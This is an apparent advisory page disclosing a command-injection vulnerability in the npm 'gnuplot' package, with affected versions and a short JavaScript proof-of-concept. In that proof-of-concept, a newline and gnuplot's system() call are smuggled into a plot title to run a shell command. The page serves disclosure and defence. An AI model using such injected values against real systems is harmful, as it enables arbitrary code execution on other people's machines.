Ecosyste.ms: Advisories

An open API service providing security vulnerability metadata for many open source software ecosystems.

Security Advisories: MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLWNmd2MteGpmcC00NGpn

Command Injection in gnuplot

All versions of gnuplot are vulnerable to Command Injection. The package fails to sanitize plot titles, which may allow attackers to execute arbitrary code in the system if the title value is supplied by a user. The following proof-of-concept creates a testing file in the current directory:

var gnuplot = require('gnuplot');

const title = '"\nset title system("touch testing")\n#';

gnuplot()
.set('term png')
.set('output "out.png"')
.set(`title "${title}"`)
.set('xrange [-10:10]')
.set('yrange [-2:2]')
.set('zeroaxis')
.plot('(x/4)**2, sin(x), 1/x')
.end();

Recommendation

No fix is currently available. Consider using an alternative package until a fix is made available.

Permalink: https://github.com/advisories/GHSA-cfwc-xjfp-44jg
JSON: https://advisories.ecosyste.ms/api/v1/advisories/MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLWNmd2MteGpmcC00NGpn
Source: GitHub Advisory Database
Origin: Unspecified
Severity: Critical
Classification: General
Published: over 3 years ago
Updated: over 1 year ago

Identifiers: GHSA-cfwc-xjfp-44jg
References:

Blast Radius: 0.0

Affected Packages

npm:gnuplot

Dependent packages: 10
Dependent repositories: 15
Downloads: 1,627 last month
Affected Version Ranges: >= 0.0.0
No known fixed version
All affected versions: 0.1.0, 0.1.1, 0.2.0, 0.3.0, 0.3.1